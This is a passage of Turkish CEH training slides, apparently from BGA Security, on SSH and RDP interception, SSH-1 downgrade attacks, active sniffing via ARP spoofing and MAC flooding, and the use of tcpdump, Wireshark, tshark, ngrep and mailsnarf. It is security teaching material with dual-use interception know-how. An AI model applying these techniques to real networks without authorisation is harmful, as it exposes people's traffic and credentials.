  • 164. BGA | CEH @BGASecurity SSH Temel Bilgiler  SSH1, Tatu Ylönen tarafından geliştirilen ilk orjinal SSH ürünü. SSH-1 protokolü temel alınarak geliştirilmiştir.  SSH2, Tatu Ylönen tarafından geliştirilen SSH-2 ürünü. www.ssh.com  SSH-1, SSH protocol 1.  SSH-2, SSH protocol 2 . Günümüzde yaygın kullanımda olan ve kullanımı tavsiye edilen ssh sürümü. IETF SECSH çalışma grubu tarafından standartları belirlenmiştir.
  • 165. BGA | CEH @BGASecurity OpenSSH  OpenSSH son özgür SSH versiyonu olan ssh1.2.12 den türetilmistir  Ticari SSH sunucular kadar özelliğe sahip  Dünya SSH servisinin %90~  Sshscan aracılığı ile alınmış resmi bilgi.
  • 166. BGA | CEH @BGASecurity SSH Protokolü Analizi
  • 167. BGA | CEH @BGASecurity Araya girme nasıl olur?  SSH-1 protokolü çeşitli tasarımsal güvenlik açıklarına sahip.  SSH-2 de bunlar giderildi.  Fakat çoğu sunucu hem ssh-1 hem de ssh-2 destekler.  Ssh-1 kullanan sistemlerde araya girip veri okuma & değiştirme yapılabilir.  Ssh-2 sistemler eğer ssh-1 destekliyorsa “downgrade attack” gerçekleştirilerek ssh-1 kullanmaya zorlanır ve saldırı yine başarılı olur.
  • 168. BGA | CEH @BGASecurity SSH1, SSH2 Destekli Sunucu Trafiği
  • 170. BGA | CEH @BGASecurity RDP(Remote Desktop Protocol) Araya Girme  RDP şifreli bir protokoldür  Public-priv key kullanılarak güvenlik sağlanır  Prive key tüm bilgisayarlarda aynıdır  “Public” private key mantığı  Cain&Abel kullanılarak authentication bilgileri alınabilir
  • 172. BGA | CEH @BGASecurity Bölüm İçeriği  Paket, protokol kavramları  Temel kavramlar  Sniffing  Sniffing'e açık protokoller  Sniffing çeşitleri  Aktif Sniff / Pasif Sniff  Ortama göre sniffer yerleşimi  Sniffing amaçlı kullanılan araçlar  Network data carving
  • 173. BGA | CEH @BGASecurity Paket Kavramı..  İletişim == paket  Ne işe yarar  Bilinmeyen Protokol Analizi  Ag trafiği ölçümü  Anormal trafik gözleme  Firewall/IDS/IPS altyapısı..  TCP, UDP Paketleri  Protokoller  SMTP, FTP, P2P trafiği nasıl ayırt edilir  http://l7-filter.sourceforge.net/protocols
  • 174. BGA | CEH @BGASecurity Temel Kavramlar  Inline/Pasif Yerleşim  Ethernet Çalışma modları  Unicast paketler  Multicast paketler  Broadcast paketler  Promiscious Mode  Snifferlar genelde Promiscious modda çalışır.  # ifconfig eth0 –promisc Komutu arabirimi promisc modda çıkarır
  • 175. BGA | CEH @BGASecurity Ethernet Kartlarında Filtreleme  Unicast-> Kendi adresine gelen paketler Broadcast -> Broadcast adresine gelen paketler Multicast-> uye olunan multicast gruba ait paketler. Promiscious -> Gelen paketin ne olduğuna bakmadan kabul edildiği durum.
  • 176. BGA | CEH @BGASecurity L2 İletişim Ortamları  HUB  Switch  Bridge
  • 177. BGA | CEH @BGASecurity Sniffing ...  Ağ trafiği dinleme  Şifreli/şifresiz protokoller  Sniffingde Amaç?  Good/Admins = “Protocol Analysis”  Bad/Hackers = “Sniffing The Wire”  Developers = “Is My Application Working
  • 178. BGA | CEH @BGASecurity Sniffing’e Açık Protokoller  Sniffing’e açık:İçerisinde taşıdığı veri okunabilir, şifrelenmemiş trafik  Hemen hemen tüm protokoller  Telnet, Rlogin  HTTP/FTP  SMTP/POP/IMAP  Güvensiz Protokollerin güvenli kullanımı  SSL Wrapper Internette en sık kullanılan 10 port
  • 179. BGA | CEH @BGASecurity SMTP Bağlantısı Sniffer SMTP Bağlantısı
  • 180. BGA | CEH @BGASecurity SMTP Bağlantısı Detaylar #mailsnarf –i rl0
  • 182. BGA | CEH @BGASecurity FTP Bağlantısı
  • 183. BGA | CEH @BGASecurity SQL Bağlantısı
  • 185. BGA | CEH @BGASecurity SSL Sarmalayıcı ile Şifreli Trafik Stunnel İstemci Sunucu SSL Sarmalayıcı ŞifreliTrafik SSL Sarmalayıcı AçıkTrafik AçıkTrafik
  • 186. BGA | CEH @BGASecurity Stunnel Yapılandırması 995. Porta gelen şifreli istekleri al, şifrelemeyi çöz ve 110. portta çalışan uygulamaya teslim et.
  • 187. BGA | CEH @BGASecurity Sniffing Çeşitleri  Pasif Sniffing  Hedef sistemle iletişime geçilmez!  Sniffing’e dair iz bulunamaz  HUB kullanılan ortamlarda  Aktif Sniffing  Hedef sistemle iletişime geçilir  Arkasında iz bırakır  Switch kullanılan Ağlarda yaygındır
  • 188. BGA | CEH @BGASecurity Pasif Sniffing  HUB/TAP kullanılan ortamlarda işe yarar  Ortama dahil olan her sistem dolaşan tüm paketleri alır  Promiscious modda olanlar paketleri kabul eder/kaydeder.  Sık Kullanılan Araçlar:  Tcpdump, Wireshark, Snort, Dsniff, Tshark
  • 189. BGA | CEH @BGASecurity Aktif Sniffing  Amaç: trafiği dinlenecek sistemin paketlerini üzerinden geçirme ya da kopyasını almak.  Switch / HUB Farkını hatırlayalım  Yöntemleri  MAC Flooding  ARP Spoofing/Poisoning  Icmp redirect  Aktif Sniffing Araçları  Arpspoof(Dsniff)  Ettercap  Cain&Abel  Macof  Kolay Yakalanabilir(?)
  • 190. BGA | CEH @BGASecurity Sniffer Yerleşimi  Ağ ortamının özelliğine göre Snifferların yerleşimi değişmektedir.  TAP kullanılan ortamlarda  HUB’lı ortamlarda  Switch kullanılan ağlarda(Port mirroring)
  • 191. BGA | CEH @BGASecurity Sniffing için HUB Kullanımı
  • 192. BGA | CEH @BGASecurity Sniffing için TAP Kullanımı TAP cihazı pasif ya da inline olabilir
  • 193. BGA | CEH @BGASecurity Sniffing için SPAN Port Kullanımı
  • 194. BGA | CEH @BGASecurity  Tcpdump  Snoop  Tshark  Wireshark  Eeye IRIS  Dsniff  Snort
  • 195. BGA | CEH @BGASecurity  UNIX Tabanlı popüler sniffer yazılımı  Windows icin windump  Libpcap tarafından alınan ham veriler tcpdump tarafından işlenerek okunabilir hale gelir.  Tamamen ücretsiz bir yazılım.  Sorun giderme , trafik analizi, hacking amaclı kullanılabilir.
  • 196. BGA | CEH @BGASecurity Tcpdump Kurulumu  Linux dağıtımları ile birlikte gelir.  Windows için Winpcap kurulu olmalıdır.  Konsoldan  Tcpdump komutunu calistirdiginizda hata vermiyorsa sistemede kurulu demektir.
  • 197. BGA | CEH @BGASecurity Ön Bilgiler  Linux/UNIX altında tcpdump programını kullanabilmek için ya root haklarına sahip olmak lazım ya da tcpdump programının suid olarak çalışması lazım.  Tcpdump, paketleri kernel'a giriş-çıkış yapmadan yakalar bu sebeple iptables (Linux için) ile yazdığınız kurallar tcpdump'ı etkilemez.
  • 198. BGA | CEH @BGASecurity Temel Kullanımı  Tcpdump komut satırından çalışan bir araç olduğu için parametreler oldukça önemlidir.  Uygun parametreler ve filtreler kullanılırsa yoğun trafikte bile istenilen amaca kolaylıkla ulaşılabilir.
  • 199. BGA | CEH @BGASecurity Parametresiz kullanım örneği
  • 203. BGA | CEH @BGASecurity Yakalanan paketleri kaydetme  Tcpdump'ın yakaladığı paketleri sonradan incelemek üzere dosyaya yazılabilir.  Dosya formatı libpcap uyumludur.  -w parametresi kullanılır.
  • 204. BGA | CEH @BGASecurity Kaydedilmiş Paketleri Okuma -w ile kaydettğimiz paketleri okumak içinde -r parametresini kullanılır.
  • 205. BGA | CEH @BGASecurity Paket Detaylarını Loglama -v parametresi ile tcpump'dan biraz daha detaylı loglama yapmasını isteyebiliriz. Mesela bu parametre ile tcpdump çıktılarını TTL ve ID değerleri ile birlikte edinebiliriz.
  • 206. BGA | CEH @BGASecurity Filtrelerle Çalışmak  host Parametresi  Sadece belli bir host a ait paketlerin izlenmesini istiyorsak host parametresi ile belirtim yapabiliriz.  dst host (Hedef Host Belirtimi)  src host (Kaynak Host Belirtimi)  # tcpdump src host 10.1.0.59 and dst host 10.1.0.1
  • 207. BGA | CEH @BGASecurity Filtrelerle Çalışmak  Port parametresi  belirli bir portu dinlemek istediğimizde kullanacağımız parametredir. Host gibi src ve dst oneklerini alabilir.  src ile kaynak portu dst ile hedef portu belirtebiliriz . dst ya da src önekini kullanmazsak hem kaynak hemde hedef portu alır.  # tcpdump src port 23 and dst port 9876
  • 208. BGA | CEH @BGASecurity Filtrelerle Çalışmak  Şartlı ifadeler  And  Or  Not  # tcpdump -i eth0 -n not tcp port 22 or host 192.168.1.1
  • 209. BGA | CEH @BGASecurity Layer 2 Başlıklarını Görüntüleme
  • 210. BGA | CEH @BGASecurity Paket içeriği (payload) Görüntüleme
  • 211. BGA | CEH @BGASecurity Nmap Taramaları ve tcpdump
  • 212. BGA | CEH @BGASecurity Hping Taramalarının Karekteristigi
  • 214. BGA | CEH @BGASecurity Sniffer Olarak Snoop  Solaris sistemler için sniffer programı  Tcpdump benzeri kullanıma sahiptir.
  • 215. BGA | CEH @BGASecurity Sniffer Olarak Wireshark  Eski adı Ethereal  Açık kaynak kodlu Sniffer aracı  Grafik arabirimli/ komut satırı  Bilinen çoğu işletim sistemlerinde çalışır  Bilinen tüm protokolleri destekler  Yakalanan paketleri kaydedebilme  Kaydedilmiş paketleri diskten okuma  Protokol renklendirme
  • 217. BGA | CEH @BGASecurity Paket Yakalama Seçenekleri
  • 218. BGA | CEH @BGASecurity Yakalanan Paketler İçin İsim Çözme
  • 220. BGA | CEH @BGASecurity Filtreler  Yakalanacak paketlere uygulanır.  Tcpdump formatı ile aynıdır.  Tcp port 22 and host vpn.lifeoverip.net or icmp  Yakalanan paketler üzerinde analiz yapılırken kullanılır.  Farklı bir formata sahiptir.  (Tcp.port eq 22) and (ip.addr eq blabla...)  Arabirimden filtre yazılabilir
  • 221. BGA | CEH @BGASecurity Capture Filter  Tcp port 21  Tcp port 21 and tcp port 1982  Tcp port 22 and host vpn.lifeoverip.net or icmp
  • 223. BGA | CEH @BGASecurity TCP Oturumlarında Paket Birleştirme
  • 225. BGA | CEH @BGASecurity Tshark  Wireshark komut satırı aracı  Tcpdump benzeri parametrelerle çalışır  Tcpdump’dan en önemli farkı protokol detaylarını gösterebilmesi ve protokol detaylarına göre filtreleme yapılabilmesidir.
  • 226. BGA | CEH @BGASecurity Tcpdump & tshark farkı
  • 227. BGA | CEH @BGASecurity Tshark Filter Kullanımı(-R)  Display filter özelliği ile Tshark çözümleyebildiği protokollere ait tüm detayları gösterebilir ve sadece bu detaylara ait paketleri yakalamaya yardımcı olur.  Amacımız dns trafiği içerisinde sadece www.lifeoverip.net domainine ait sorgulamaları yakalamak istersek aşağıdaki gibi bir filtreleme kullanılabilir.
  • 228. BGA | CEH @BGASecurity Tshark Filter Kullanımı-II HTTP trafiği içerisindeGET, PUT ve OPTIONS kullanılan istekleri yakalama BirTCP Bağlantısına ait başlangıç ve bitiş paketlerini yakalama
  • 229. BGA | CEH @BGASecurity Sniffer Olarak Eeye Iris
  • 230. BGA | CEH @BGASecurity Network Grep:Ngrep  Grep: UNIX/Linux sistemlerde dosya içerisinde belirli düzene uyan stringlerin/satırların bulunmasını sağlar  Ngrep(Network Grep): grep benzeri bir yazılım fakat klasik dosyalarda değil de ağ trafiğinde arama/bulma işlemi yapar.
  • 231. BGA | CEH @BGASecurity Ngrep ile Ne Yapılabilir?  http portu üzerinden kullanılan SSH bağlantılarını ngrep ile keşfedebilirsiniz  Ağda şifresiz trafik kullananların parolalarını kaydedip uyarabilirsiniz.  Tünelleme programlarını ortamda hiçbir IPS, Firewall vs ye ihtiyaç duymadan Ngrep ile yakalayabilirsiniz
  • 232. BGA | CEH @BGASecurity Ngrep ile SMTP Analizi
  • 233. BGA | CEH @BGASecurity Http Portundan Yapılan SSH Bu komutu biraz daha geliştirip SSH portu harici herhangi bir porttan SSH kullanmaya çalışanları izleyebilirsiniz.
  • 234. BGA | CEH @BGASecurity Ngrep’i IDS Olarak Kullanma Amaç: HTTP portu üzerinden yapılan fakat http olmayan bağlantıları izleme
  • 235. BGA | CEH @BGASecurity UrlSnarf Trafikten pasif olarak HTTP isteklerini ayıklar
  • 236. @BGASecurity bgasecurity.com | @bgasecurity Devamı için sonraki bölümlere geçiniz.